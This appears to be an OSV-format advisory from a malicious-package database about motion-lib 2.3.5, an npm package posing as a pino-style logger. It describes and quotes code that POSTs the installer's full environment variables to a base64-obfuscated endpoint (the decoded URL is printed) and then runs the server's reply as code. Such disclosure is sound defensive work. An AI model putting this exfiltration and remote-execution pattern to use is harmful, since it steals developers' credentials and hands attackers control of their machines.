{"id":"MAL-2026-5925","summary":"Malicious code in motion-lib (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176)\nmotion-lib@2.3.5 masquerades as a pino-style logger (exports module.exports.pino, ships proto.js/multistream.js/transport.js/redaction.js/levels.js, advertises 'fast','logger','stream','json' keywords) but its middleware factory in index.js spawns a detached `node lib/initializeCaller.js`. That script shadows `process` with a local object whose `env.DEV_API_KEY` holds a base64-encoded string that decodes to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df, then POSTs the host's full real `process.env` to that endpoint with header `x-secret-header: secret` (`axios.post(apiEndpoint, {...process.env },...)`). The HTTP response body is then executed via `new Function('require', response.data); executor(require);`, giving the remote endpoint arbitrary code execution with full Node capabilities (filesystem, network, child_process) on the installer's machine. The combination of full-environment exfiltration (AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI secrets, DB creds), eval-of-remote-response RCE, base64 obfuscation of the C2 URL, and impersonation of a popular logger package is an unambiguous supply-chain attack.\n","modified":"2026-06-16T21:16:47.065403493Z","published":"2026-06-16T19:46:09Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-006827","versions":["2.3.5"],"import_time":"2026-06-16T21:06:46.893333119Z","modified_time":"2026-06-16T19:46:09Z","source":"amazon-inspector","sha256":"0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/motion-lib/v/2.3.5"}],"affected":[{"package":{"name":"motion-lib","ecosystem":"npm","purl":"pkg:npm/motion-lib"},"versions":["2.3.5"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"indicators":{"evidence_files":[{"path":"lib/initializeCaller.js","tlsh":"f921f38e15fe101d066751e6bb2f24027022e8133946d4a47bcc835b1fc966e99936df","sha256":"fc61b0ed62e346bfbb5e1e093e475d8b3065247dc8d315f0ea4e7cafd9661bad"},{"path":"index.js","tlsh":"0f318545b5f21259126d98c4f6b4a5263cdf9437331b76b1cded93952bce2080032bc7","sha256":"1f51184c197102444a2c8a23e4a8e54a6479750420512922fcb5d5f795c33911"}],"package_integrity":[{"hashes":{"sha1":"54e31dbde7db0816917f2c63b0934be741bce117","sha512_sri":"sha512-VqRbZ1gRQ03qx3Gt+NIJQ21VhgaS6GT5+W5WSRbBtAw+MyeIR5O1m/Wkk7NHThZpw4n0LvpLxSjwRgYsXjWs9g=="},"filename":"motion-lib-2.3.5.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/motion-lib/MAL-2026-5925.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}